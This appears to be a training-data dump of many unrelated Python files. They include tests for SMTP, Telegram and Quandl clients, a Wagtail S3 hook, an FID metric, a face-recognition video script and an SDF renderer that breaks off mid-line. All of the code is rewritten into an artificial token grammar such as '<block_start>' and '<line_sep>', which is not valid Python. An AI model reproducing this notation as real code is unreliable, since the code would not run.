content
stringlengths 0
1.55M
|
---|
<import_stmt>pytest<import_stmt>numpy<as>np<import_stmt>pclpy<def_stmt>test_eigen_vectorxf <block_start>a=np.array([1 1 1 1] "f")<line_sep>vec=pclpy.pcl.vectors.VectorXf(a)<assert_stmt>np.allclose(np.array(vec) a)<block_end> |
<import_from_stmt>django.core.files.storage get_storage_class<import_from_stmt>django.shortcuts redirect<import_from_stmt>django.utils.cache add_never_cache_headers<import_from_stmt>storages.backends.s3boto3 S3Boto3Storage<import_from_stmt>wagtail.core hooks<import_from_stmt>wagtail.documents get_document_model<import_from_stmt>wagtail.documents.models document_served<line_sep>@hooks.register("before_serve_document" order=100)<def_stmt>serve_document_from_s3 document request# Skip this hook if not using django-storages boto3 backend.
<block_start><if_stmt><not>issubclass(get_storage_class() S3Boto3Storage)<block_start><return><block_end># Send document_served signal.
document_served.send(sender=get_document_model() instance=document request=request)<line_sep># Get direct S3 link.
file_url=document.file.url<line_sep># Generate redirect response and add never_cache headers.
response=redirect(file_url)<del_stmt>response["Cache-control"]<line_sep>add_never_cache_headers(response)<line_sep><return>response<block_end>@hooks.register("construct_settings_menu")<def_stmt>hide_main_menu_menu_item request menu_items<block_start>menu_items[:]=[item<for>item menu_items<if>item.name<ne>"main-menu"]<block_end> |
"""Configuration file for production Development"""<line_sep>DEBUG=<false><line_sep> |
"""
Sync method tests.
"""<import_stmt>pytest<import_from_stmt>aiosmtplib.sync async_to_sync<def_stmt>test_sendmail_sync event_loop smtp_client_threaded sender_str recipient_str message_str<block_start>errors,response=smtp_client_threaded.sendmail_sync(sender_str [recipient_str] message_str)<assert_stmt><not>errors<assert_stmt>isinstance(errors dict)<assert_stmt>response<ne>""<block_end><def_stmt>test_sendmail_sync_when_connected event_loop smtp_client_threaded sender_str recipient_str message_str<block_start>event_loop.run_until_complete(smtp_client_threaded.connect())<line_sep>errors,response=smtp_client_threaded.sendmail_sync(sender_str [recipient_str] message_str)<assert_stmt><not>errors<assert_stmt>isinstance(errors dict)<assert_stmt>response<ne>""<block_end><def_stmt>test_send_message_sync event_loop smtp_client_threaded message<block_start>errors,response=smtp_client_threaded.send_message_sync(message)<assert_stmt><not>errors<assert_stmt>isinstance(errors dict)<assert_stmt>response<ne>""<block_end><def_stmt>test_send_message_sync_when_connected event_loop smtp_client_threaded message<block_start>event_loop.run_until_complete(smtp_client_threaded.connect())<line_sep>errors,response=smtp_client_threaded.send_message_sync(message)<assert_stmt><not>errors<assert_stmt>isinstance(errors dict)<assert_stmt>response<ne>""<block_end><def_stmt>test_async_to_sync_without_loop event_loop<block_start><async_keyword><def_stmt>test_func <block_start><return>7<block_end>result=async_to_sync(test_func())<assert_stmt>result<eq>7<block_end><def_stmt>test_async_to_sync_with_exception event_loop<block_start><async_keyword><def_stmt>test_func <block_start><raise>ZeroDivisionError<block_end><with_stmt>pytest.raises(ZeroDivisionError)<block_start>async_to_sync(test_func() loop=event_loop)<block_end><block_end>@pytest.mark.asyncio<async_keyword><def_stmt>test_async_to_sync_with_running_loop event_loop<block_start><with_stmt>pytest.raises(RuntimeError)<block_start>async_to_sync(<none>)<block_end><block_end> |
# Copyright 2020 Makani Technologies LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Custom flag type definitions."""<import_stmt>gflags<import_stmt>numpy<def_stmt>DEFINE_linspace name default help_string nonempty=<false> increasing=<false> flag_values=gflags.FLAGS **kwargs# pylint: disable=invalid-name
<block_start>"""Defines a 'linspace' flag.
The flag value should be specified as <lower>,<upper>,<count>. The
components are used as arguments to numpy.linspace, so they must be
parsable as float, float, and int, respectively. The parsed flag
value will be a 1-dimensional numpy.ndarray.
Args:
name: Name of the flag.
default: Default value (as unparsed string), or None if flag is unset by
default.
help_string: Helpful description of the flag.
nonempty: Indicates whether the flag value is required to be nonempty. If
True, None is still an allowable default. Use gflags.MarkFlagAsRequired
to disallow None.
increasing: Indicates whether the flag value should be an increasing array.
This is only enforced if the parsed value has >=2 elements.
flag_values: The gflags.FlagValues object in which to define the flag.
**kwargs: See gflags.DEFINE.
"""<line_sep>gflags.DEFINE(_LinspaceParser() name default help_string flag_values=flag_values **kwargs)<if_stmt>nonempty# numpy.array can't be implicitly converted to a boolean.
# pylint: disable=g-explicit-length-test
<block_start>gflags.RegisterValidator(name <lambda>v:len(v)<g>0 '--%s must specify a nonempty range.'%name flag_values=flag_values)<block_end><if_stmt>increasing<block_start>gflags.RegisterValidator(name <lambda>v:len(v)<l>2<or>v[-1]<g>v[0] '--%s must specify an increasing range.' flag_values=flag_values)<block_end><block_end><class_stmt>_LinspaceParser(gflags.ArgumentParser)<block_start>"""Parser for 'linspace' flag type."""<def_stmt>Parse self argument<block_start>parts=argument.split(',')<if_stmt>len(parts)<ne>3<block_start><raise>ValueError('Wrong number of components. Must be of the form '<concat>'<lower>,<upper>,<count>' argument)<block_end><try_stmt><block_start>lower,upper,count=float(parts[0]) float(parts[1]) int(parts[2])<block_end><except_stmt>ValueError<block_start><raise>ValueError('Bad value. Components must be parsable as float, '<concat>'float, and int, respectively' argument)<block_end><return>numpy.linspace(lower upper count)<block_end><def_stmt>Type self<block_start><return>numpy.ndarray<block_end><block_end> |
# -*- coding:utf-8 -*-
__author__='yangjian'<line_sep> |
# coding=utf-8
# Copyright 2018 Google LLC & <NAME>.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of the Frechet Inception Distance.
Implemented as a wrapper around the tf.contrib.gan library. The details can be
found in "GANs Trained by a Two Time-Scale Update Rule Converge to a Local Nash
Equilibrium", Heusel et al. [https://arxiv.org/abs/1706.08500].
"""<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_stmt>absl logging<import_from_stmt>compare_gan.metrics eval_task<import_stmt>tensorflow<as>tf<import_stmt>tensorflow_gan<as>tfgan<line_sep># Special value returned when FID code returned exception.
FID_CODE_FAILED=4242.0<class_stmt>FIDScoreTask(eval_task.EvalTask)<block_start>"""Evaluation task for the FID score."""<line_sep>_LABEL="fid_score"<def_stmt>run_after_session self fake_dset real_dset<block_start>logging.info("Calculating FID.")<with_stmt>tf.Graph().as_default()<block_start>fake_activations=tf.convert_to_tensor(fake_dset.activations)<line_sep>real_activations=tf.convert_to_tensor(real_dset.activations)<line_sep>fid=tfgan.eval.frechet_classifier_distance_from_activations(real_activations=real_activations generated_activations=fake_activations)<with_stmt>self._create_session()<as>sess<block_start>fid=sess.run(fid)<block_end>logging.info("Frechet Inception Distance: %.3f." fid)<line_sep><return>{self._LABEL:fid}<block_end><block_end><block_end><def_stmt>compute_fid_from_activations fake_activations real_activations<block_start>"""Returns the FID based on activations.
Args:
fake_activations: NumPy array with fake activations.
real_activations: NumPy array with real activations.
Returns:
A float, the Frechet Inception Distance.
"""<line_sep>logging.info("Computing FID score.")<assert_stmt>fake_activations.shape<eq>real_activations.shape<with_stmt>tf.Session(graph=tf.Graph())<as>sess<block_start>fake_activations=tf.convert_to_tensor(fake_activations)<line_sep>real_activations=tf.convert_to_tensor(real_activations)<line_sep>fid=tfgan.eval.frechet_classifier_distance_from_activations(real_activations=real_activations generated_activations=fake_activations)<line_sep><return>sess.run(fid)<block_end><block_end> |
<import_stmt>pytest<import_from_stmt>bottery.message Message<import_from_stmt>bottery.telegram reply<import_from_stmt>bottery.telegram.engine TelegramChat TelegramEngine TelegramUser<line_sep>@pytest.fixture<def_stmt>engine <block_start><return>TelegramEngine<block_end>@pytest.fixture<def_stmt>user <block_start><return>TelegramUser<block_end>@pytest.fixture<def_stmt>chat <block_start><return>TelegramChat<block_end>@pytest.fixture()<def_stmt>message <block_start><return>Message(id=1 platform='telegram' text='' user=user chat=chat timestamp='' raw='' )<block_end>@pytest.fixture<def_stmt>message_data <block_start><return>{'message':{'chat':{'first_name':'John' 'id':12345678 'last_name':'Snow' 'type':'private' 'username':'johnsnow'} 'date':1516787847 'from':{'first_name':'John' 'id':12345678 'is_bot':<false> 'language_code':'en-US' 'last_name':'Snow' 'username':'johnsnow'} 'message_id':2 'text':'Hi bot, how are you?'} 'update_id':987456321}<block_end>@pytest.fixture<def_stmt>edited_message_data message_data<block_start><return>{'edited_message':message_data['message']}<block_end>@pytest.mark.parametrize('chat_type,id_expected' [('group' 456) ('private' 123) ])<def_stmt>test_platform_telegram_engine_get_chat_id chat_type id_expected engine message<block_start>setattr(message.chat 'id' id_expected)<line_sep>setattr(message.chat 'type' chat_type)<line_sep>setattr(message.user 'id' id_expected)<assert_stmt>engine.get_chat_id(engine message)<eq>id_expected<block_end>@pytest.mark.parametrize('message_input,message_key,message_edited' [(pytest.lazy_fixture('message_data') 'message' <false>) (pytest.lazy_fixture('edited_message_data') 'edited_message' <true>)])<def_stmt>test_build_message engine message_input message_key message_edited<block_start>message=engine.build_message(engine message_input)<assert_stmt>message.id<eq>message_input[message_key]['message_id']<assert_stmt>message.text<eq>message_input[message_key]['text']<assert_stmt>message.timestamp<eq>message_input[message_key]['date']<assert_stmt>message.raw<eq>message_input<assert_stmt>message.edited<eq>message_edited<block_end><def_stmt>test_build_message_without_text message_data engine<block_start>'''
Telegram can send a message without text.
For example, when a bot is added to a group.
'''<line_sep>message_data_without_text=message_data<del_stmt>message_data_without_text['message']['text']<line_sep>message=engine.build_message(engine message_data_without_text)<assert_stmt>message.id<eq>message_data_without_text['message']['message_id']<assert_stmt>message.text<is><not><none><assert_stmt>message.text<eq>''<assert_stmt>message.timestamp<eq>message_data_without_text['message']['date']<assert_stmt>message.raw<eq>message_data<block_end><def_stmt>test_reply_decorator message<block_start>@reply()<def_stmt>view message<block_start><return>''<block_end>view(message)<assert_stmt>message._request_payload['reply_to_message_id']<eq>message.id<block_end><def_stmt>test_reply_decorator_to_previous_message message<block_start>@reply(to=<lambda>message:message.id-2)<def_stmt>view message<block_start><return>''<block_end>view(message)<assert_stmt>message._request_payload['reply_to_message_id']<eq>message.id-2<block_end> |
"""
Quick plot for the outputs of transcritical flow without shock
"""<import_stmt>anuga.utilities.plot_utils<as>util<import_stmt>matplotlib<line_sep>matplotlib.use('Agg')<import_from_stmt>matplotlib pyplot<as>pyplot<import_from_stmt>analytical_without_shock *<import_from_stmt>numpy ones<line_sep>p_st=util.get_output('transcritical.sww')<line_sep>p2_st=util.get_centroids(p_st)<line_sep>v=p2_st.y[10]<line_sep>v2=(p2_st.y<eq>v)<line_sep>h,z=analytic_sol(p2_st.x[v2])<line_sep>tid=100<line_sep>#Plot the stages##############################################################
pyplot.clf()<line_sep>pyplot.plot(p2_st.x[v2] p2_st.stage[tid v2] 'b.-' label='numerical stage')# 0*T/6
pyplot.plot(p2_st.x[v2] h+z 'r-' label='analytical stage')<line_sep>pyplot.plot(p2_st.x[v2] z 'k-' label='bed elevation')<line_sep>pyplot.title('Stage at time %s secs'%p2_st.time[tid])<line_sep>##pyplot.ylim(-5.0,5.0)
pyplot.legend(loc='best')<line_sep>pyplot.xlabel('Xposition')<line_sep>pyplot.ylabel('Stage')<line_sep>pyplot.savefig('stage_plot.png')<line_sep>#Plot the momentums##########################################################
pyplot.clf()<line_sep>pyplot.plot(p2_st.x[v2] p2_st.xmom[tid v2] 'b.-' label='numerical')# 0*T/6
pyplot.plot(p2_st.x[v2] 1.53<times>ones(len(p2_st.x[v2])) 'r-' label='analytical')<line_sep>pyplot.title('Xmomentum at time %s secs'%p2_st.time[tid])<line_sep>pyplot.legend(loc='best')<line_sep>pyplot.ylim([1.52 1.54])<line_sep>pyplot.xlabel('Xposition')<line_sep>pyplot.ylabel('Xmomentum')<line_sep>pyplot.savefig('xmom_plot.png')<line_sep>#Plot the velocities#########################################################
pyplot.clf()<line_sep>pyplot.plot(p2_st.x[v2] p2_st.xvel[tid v2] 'b.-' label='numerical')# 0*T/6
pyplot.plot(p2_st.x[v2] 1.53/h 'r-' label='analytical')<line_sep>pyplot.title('Xvelocity at time %s secs'%p2_st.time[tid])<line_sep>pyplot.legend(loc='best')<line_sep>pyplot.xlabel('Xposition')<line_sep>pyplot.ylabel('Xvelocity')<line_sep>pyplot.savefig('xvel_plot.png')<line_sep> |
<import_stmt>argparse<import_stmt>glob<import_stmt>os<import_stmt>time<import_stmt>cv2<import_stmt>imutils<import_from_stmt>imutils.object_detection non_max_suppression<line_sep>subject_label=1<line_sep>font=cv2.FONT_HERSHEY_SIMPLEX<line_sep>list_of_videos=[]<line_sep>cascade_path="face_cascades/haarcascade_profileface.xml"<line_sep>face_cascade=cv2.CascadeClassifier(cascade_path)<line_sep>hog=cv2.HOGDescriptor()<line_sep>hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())<line_sep>recognizer=cv2.face.LBPHFaceRecognizer_create()<line_sep>count=0<def_stmt>detect_people frame<block_start>"""
detect humans using HOG descriptor
Args:
frame:
Returns:
processed frame
"""<line_sep>(rects weights)=hog.detectMultiScale(frame winStride=(8 8) padding=(16 16) scale=1.06)<line_sep>rects=non_max_suppression(rects probs=<none> overlapThresh=0.65)<for_stmt>(x y w h) rects<block_start>cv2.rectangle(frame (x y) (x+w y+h) (0 0 255) 2)<block_end><return>frame<block_end><def_stmt>detect_face frame<block_start>"""
detect human faces in image using haar-cascade
Args:
frame:
Returns:
coordinates of detected faces
"""<line_sep>faces=face_cascade.detectMultiScale(frame 1.1 2 0 (20 20))<line_sep><return>faces<block_end><def_stmt>recognize_face frame_orginal faces<block_start>"""
recognize human faces using LBPH features
Args:
frame_orginal:
faces:
Returns:
label of predicted person
"""<line_sep>predict_label=[]<line_sep>predict_conf=[]<for_stmt>x,y,w,h faces<block_start>frame_orginal_grayscale=cv2.cvtColor(frame_orginal[y:y+h x:x+w] cv2.COLOR_BGR2GRAY)<line_sep>cv2.imshow("cropped" frame_orginal_grayscale)<line_sep>predict_tuple=recognizer.predict(frame_orginal_grayscale)<line_sep>a,b=predict_tuple<line_sep>predict_label.append(a)<line_sep>predict_conf.append(b)<line_sep>print("Predition label, confidence: "+str(predict_tuple))<block_end><return>predict_label<block_end><def_stmt>draw_faces frame faces<block_start>"""
draw rectangle around detected faces
Args:
frame:
faces:
Returns:
face drawn processed frame
"""<for_stmt>(x y w h) faces<block_start>xA=x<line_sep>yA=y<line_sep>xB=x+w<line_sep>yB=y+h<line_sep>cv2.rectangle(frame (xA yA) (xB yB) (0 255 0) 2)<block_end><return>frame<block_end><def_stmt>put_label_on_face frame faces labels<block_start>"""
draw label on faces
Args:
frame:
faces:
labels:
Returns:
processed frame
"""<line_sep>i=0<for_stmt>x,y,w,h faces<block_start>cv2.putText(frame str(labels[i]) (x y) font 1 (255 255 255) 2)<line_sep>i<augadd>1<block_end><return>frame<block_end><def_stmt>background_subtraction previous_frame frame_resized_grayscale min_area<block_start>"""
This function returns 1 for the frames in which the area
after subtraction with previous frame is greater than minimum area
defined.
Thus expensive computation of human detection face detection
and face recognition is not done on all the frames.
Only the frames undergoing significant amount of change (which is controlled min_area)
are processed for detection and recognition.
"""<line_sep>frameDelta=cv2.absdiff(previous_frame frame_resized_grayscale)<line_sep>thresh=cv2.threshold(frameDelta 25 255 cv2.THRESH_BINARY)[1]<line_sep>thresh=cv2.dilate(thresh <none> iterations=2)<line_sep>im2,cnts,hierarchy=cv2.findContours(thresh.copy() cv2.RETR_EXTERNAL cv2.CHAIN_APPROX_SIMPLE)<line_sep>temp=0<for_stmt>c cnts# if the contour is too small, ignore it
<block_start><if_stmt>cv2.contourArea(c)<g>min_area<block_start>temp=1<block_end><block_end><return>temp<block_end><if_stmt>__name__<eq>'__main__'<block_start>"""
main function
"""<line_sep>ap=argparse.ArgumentParser()<line_sep>ap.add_argument("-v" "--videos" required=<true> help="path to videos directory")<line_sep>args=vars(ap.parse_args())<line_sep>path=args["videos"]<for_stmt>f os.listdir(path)<block_start>list_of_videos=glob.glob(os.path.join(os.path.abspath(path) f))<line_sep>print(os.path.join(os.path.abspath(path) f)+"*.mp4")<line_sep>print(list_of_videos)<if_stmt>os.path.exists("model.yaml")<block_start>recognizer.read("model.yaml")<for_stmt>video list_of_videos<block_start>camera=cv2.VideoCapture(os.path.join(path video))<line_sep>grabbed,frame=camera.read()<line_sep>print(frame.shape)<line_sep>frame_resized=imutils.resize(frame width=min(800 frame.shape[1]))<line_sep>frame_resized_grayscale=cv2.cvtColor(frame_resized cv2.COLOR_BGR2GRAY)<line_sep>print(frame_resized.shape)<line_sep># defining min cuoff area
min_area=(3000/800)<times>frame_resized.shape[1]<while_stmt><true><block_start>starttime=time.time()<line_sep>previous_frame=frame_resized_grayscale<line_sep>grabbed,frame=camera.read()<if_stmt><not>grabbed<block_start><break><block_end>frame_resized=imutils.resize(frame width=min(800 frame.shape[1]))<line_sep>frame_resized_grayscale=cv2.cvtColor(frame_resized cv2.COLOR_BGR2GRAY)<line_sep>temp=background_subtraction(previous_frame frame_resized_grayscale min_area)<if_stmt>temp<eq>1<block_start>frame_processed=detect_people(frame_resized)<line_sep>faces=detect_face(frame_resized_grayscale)<if_stmt>len(faces)<g>0<block_start>frame_processed=draw_faces(frame_processed faces)<line_sep>label=recognize_face(frame_resized faces)<line_sep>frame_processed=put_label_on_face(frame_processed faces label)<block_end>cv2.imshow("Detected Human and face" frame_processed)<line_sep>key=cv2.waitKey(1)&0xFF<if_stmt>key<eq>ord("q")<block_start><break><block_end>endtime=time.time()<line_sep>print("Time to process a frame: "+str(starttime-endtime))<block_end><else_stmt><block_start>count=count+1<line_sep>print("Number of frame skipped in the video= "+str(count))<block_end><block_end>camera.release()<line_sep>cv2.destroyAllWindows()<block_end><block_end><else_stmt><block_start>print("model file not found")<block_end>list_of_videos=[]<block_end><block_end> |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
<def_stmt>print_color code:int message:str<arrow><none><block_start>print(f"\033[{code}m{message}\033[00m")<block_end><def_stmt>print_green message:str<arrow><none><block_start>print_color(92 message)<block_end><def_stmt>print_yellow message:str<arrow><none><block_start>print_color(93 message)<block_end><def_stmt>print_cyan message:str<arrow><none><block_start>print_color(96 message)<block_end><def_stmt>print_red message:str<arrow><none><block_start>print_color(91 message)<block_end><def_stmt>snake_to_camelcase name:str<arrow>str<block_start>"""Convert snake-case string to camel-case string."""<line_sep><return>"".join(n.capitalize()<for>n name.split("_"))<block_end> |
<import_stmt>unittest<import_from_stmt>test.helpers.httpretty_extension httpretty<import_stmt>six<import_stmt>datetime<import_stmt>pandas<import_from_stmt>quandl.model.dataset Dataset<import_from_stmt>quandl.model.data Data<import_from_stmt>quandl.model.merged_data_list MergedDataList<import_from_stmt>quandl.model.merged_dataset MergedDataset<import_from_stmt>mock patch call<import_from_stmt>quandl.errors.quandl_error ColumnNotFound<import_from_stmt>test.helpers.merged_datasets_helper setupDatasetsTest<class_stmt>GetMergedDatasetTest(unittest.TestCase)<block_start>@classmethod<def_stmt>setUp self<block_start>setupDatasetsTest(self httpretty)<block_end>@classmethod<def_stmt>tearDownClass cls<block_start>httpretty.disable()<line_sep>httpretty.reset()<block_end>@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')<def_stmt>test_merged_dataset_calls_merged_dataset_get_dataset self mock<block_start>mock.return_value=self.oil_obj<line_sep>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>md.data_fields()<line_sep>expected_calls=[call(('NSE/OIL' {'column_index':[1 2]})) call(('WIKI/AAPL' {'column_index':[1]})) call('WIKI/MSFT')]<line_sep>self.assertEqual(mock.call_count 3)<for_stmt>index,expected enumerate(expected_calls)<block_start>self.assertEqual(mock.mock_calls[index] expected)<block_end><block_end>@patch('quandl.model.merged_dataset.MergedDataset._build_dataset_object')<def_stmt>test_removes_column_index_query_param self mock<block_start>self.oil_obj.requested_column_indexes=[]<line_sep>mock.return_value=self.oil_obj<line_sep>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]})] params={'column_index':1})<line_sep>md.data_fields()<line_sep>expected=call(('NSE/OIL' {'column_index':[1 2]}) params={})<line_sep>self.assertEqual(mock.call_args expected)<block_end><def_stmt>test_sets_dataset_codes_for_the_datasets self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md._datasets <none>)<line_sep>six.assertCountEqual(self [1 2] md.dataset_codes[0][1]['column_index'])<line_sep>six.assertCountEqual(self [1] md.dataset_codes[1][1]['column_index'])<line_sep>self.assertEqual('I' md.dataset_codes[2][1])<block_end><def_stmt>test_sets_column_index_on_each_dataset self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>md.data_fields()<line_sep>six.assertCountEqual(self [1 2] md._datasets[0].requested_column_indexes)<line_sep>six.assertCountEqual(self [1] md._datasets[1].requested_column_indexes)<line_sep>six.assertCountEqual(self [] md._datasets[2].requested_column_indexes)<block_end><def_stmt>test_merged_dataset_column_names self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>expected=[six.u('Date') six.u('NSE/OIL - column.1') six.u('NSE/OIL - column.2') six.u('WIKI/AAPL - column.1') six.u('WIKI/MSFT - column.1') six.u('WIKI/MSFT - column.2') six.u('WIKI/MSFT - column.3')]<line_sep>six.assertCountEqual(self md.column_names expected)<block_end><def_stmt>test_merged_dataset_oldest_available_date self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md.oldest_available_date datetime.date(2013 1 1))<block_end><def_stmt>test_merged_dataset_newest_available_date self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>self.assertEqual(md.newest_available_date datetime.date(2015 7 30))<block_end><def_stmt>test_merged_dataset_database_codes self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>six.assertCountEqual(self md.database_code ['NSE' 'WIKI'])<block_end><def_stmt>test_merged_dataset_dataset_codes self<block_start>md=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')])<line_sep>six.assertCountEqual(self md.dataset_code ['OIL' 'AAPL' 'MSFT'])<block_end><def_stmt>test_get_returns_merged_dataset_obj self<block_start>md=MergedDataset(['NSE/OIL'])<line_sep>self.assertIsInstance(md MergedDataset)<block_end><def_stmt>test_raise_error_when_datasets_arg_not_list self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset('NSE/OIL').data_fields())<block_end><def_stmt>test_raise_error_when_datasets_arg_list_has_invalid_type self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset(['NSE/OIL' {'blah':[1]}]).data_fields())<block_end><def_stmt>test_raise_error_when_column_index_specified_and_not_list self<block_start>self.assertRaises(ValueError <lambda>:MergedDataset([('NSE/OIL' {'column_index':'foo'})]).data_fields())<block_end><def_stmt>test_raise_error_when_column_index_greater_than_max self<block_start>self.assertRaises(ColumnNotFound <lambda>:MergedDataset([('NSE/OIL' {'column_index':[1 10]})]).data())<block_end><def_stmt>test_raise_error_when_column_index_less_than_one self<block_start>self.assertRaises(ColumnNotFound <lambda>:MergedDataset([('NSE/OIL' {'column_index':[0 1]})]).data())<block_end>@patch.object(Dataset 'data')<def_stmt>test_when_only_one_column_requested_adds_column_index_query_param self mock_method<block_start>mock_method.return_value=self.data_list_obj<line_sep>MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data(params={'start_date':'2015-07-01'})<line_sep>expected_calls=[call(params={'start_date':'2015-07-01'}) call(params={'column_index':1 'start_date':'2015-07-01'}) call(params={'start_date':'2015-07-01'})]<line_sep>self.assertEqual(mock_method.mock_calls[0] expected_calls[0])<line_sep>self.assertEqual(mock_method.mock_calls[1] expected_calls[1])<line_sep>self.assertEqual(mock_method.mock_calls[2] expected_calls[2])<block_end>@patch.object(Dataset 'data')<def_stmt>test_data_forwards_requests_to_datset_data self mock_method<block_start>mock_method.return_value=self.data_list_obj<line_sep>MergedDataset(['NSE/OIL' 'WIKI/AAPL' 'WIKI/MSFT']).data(params={'start_date':'2015-07-01'})<line_sep>self.assertEqual(mock_method.call_count 3)<for_stmt>actual mock_method.mock_calls<block_start>self.assertEqual(actual call(params={'start_date':'2015-07-01'}))<block_end><block_end><def_stmt>test_get_merged_dataset_data_returns_correct_types self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>self.assertIsInstance(data MergedDataList)<line_sep>self.assertIsInstance(data[0] Data)<block_end><def_stmt>test_get_merged_dataset_creates_merged_pandas_dataframe self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('WIKI/AAPL' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>self.assertIsInstance(data.to_pandas() pandas.core.frame.DataFrame)<block_end><def_stmt>test_get_merged_dataset_data_returns_specified_columns self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('SINGLE/COLUMN' {'column_index':[1]}) ('WIKI/MSFT')]).data()<line_sep>actual=data.to_pandas().columns.tolist()<line_sep>expected=[six.u('NSE/OIL - column.1') six.u('NSE/OIL - column.2') six.u('SINGLE/COLUMN - column.1') six.u('WIKI/MSFT - column.1') six.u('WIKI/MSFT - column.2') six.u('WIKI/MSFT - column.3')]<line_sep>six.assertCountEqual(self actual expected)<block_end><def_stmt>test_get_merged_dataset_data_to_list self<block_start>data=MergedDataset([('NSE/OIL' {'column_index':[1 2]}) ('SINGLE/COLUMN' {'column_index':[1]}) 'WIKI/MSFT']).data()<line_sep>results=data.to_list()<line_sep># NSE/OIL two columns of data
# SINGLE/COLUMN one column of data
# WIKI/MSFT all 3 columns of data
expected=[[datetime.datetime(2015 7 11 0 0) 444.3 10 444.3 444.3 10 3] [datetime.datetime(2015 7 13 0 0) 433.3 4 433.3 433.3 4 3] [datetime.datetime(2015 7 14 0 0) 437.5 3 437.5 437.5 3 3] [datetime.datetime(2015 7 15 0 0) 440.0 2 440.0 440.0 2 3]]<for_stmt>index,expected_item enumerate(expected)<block_start>six.assertCountEqual(self expected_item results[index])<block_end><block_end><def_stmt>test_get_merged_dataset_data_is_descending_when_specified_in_params self<block_start>data=MergedDataset(['NSE/OIL' 'WIKI/AAPL' 'WIKI/MSFT']).data(params={'order':'desc'})<line_sep>results=data.to_list()<line_sep>dates=list([x[0]<for>x results])<line_sep>self.assertTrue(all(dates[i]<ge>dates[i+1]<for>i range(len(dates)-1)))<block_end><block_end> |
<import_from_stmt>torch.distributed.distributed_c10d is_initialized<import_from_stmt>torch.utils.data Dataset DistributedSampler<def_stmt>get_ddp_sampler dataset:Dataset epoch:int<block_start>"""
This function will create a DistributedSampler if DDP is initialized,
and will just return None if DDP is not initialized.
"""<if_stmt>is_initialized()<block_start>sampler=DistributedSampler(dataset)<line_sep>sampler.set_epoch(epoch)<block_end><else_stmt><block_start>sampler=<none><block_end><return>sampler<block_end> |
<import_stmt>os sys<import_stmt>torch<import_stmt>numpy<as>np<line_sep>sys.path.append(os.path.dirname(os.path.abspath(__file__)))<import_from_stmt>renderer SDFRenderer<line_sep>sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)) '..' '..'))<import_from_stmt>core.utils.decoder_utils decode_sdf decode_sdf_gradient decode_color<import_from_stmt>core.visualize.profiler Profiler<class_stmt>SDFRenderer_deepsdf(SDFRenderer)<block_start><def_stmt>__init__ self decoder intrinsic img_hw=<none> march_step=50 buffer_size=5 ray_marching_ratio=1.5 max_sample_dist=0.2 threshold=5e-5 use_gpu=<true> is_eval=<true><block_start>super(SDFRenderer_deepsdf self).__init__(decoder intrinsic img_hw=img_hw march_step=march_step buffer_size=buffer_size ray_marching_ratio=ray_marching_ratio max_sample_dist=max_sample_dist threshold=threshold use_gpu=use_gpu is_eval=is_eval)<block_end><def_stmt>get_samples self latent RT depth normal clamp_dist=0.1 eta=0.01 use_rand=<true><block_start>R,T=RT[: :3] RT[: 3]<line_sep>cam_pos=self.get_camera_location(R T)<line_sep>cam_rays=self.get_camera_rays(R)<line_sep>depth=depth.reshape(-1)<line_sep>normal=normal.reshape(-1 3)<line_sep>valid_mask=(depth<l>1e5)&(depth<g>0)<line_sep>valid_depth,valid_normal=depth[valid_mask] normal[valid_mask :]<line_sep>valid_zdepth=valid_depth/self.calib_map[valid_mask]<line_sep>points=self.generate_point_samples(cam_pos cam_rays[: valid_mask] valid_zdepth has_zdepth_grad=<false>)<line_sep>points=points.transpose(1 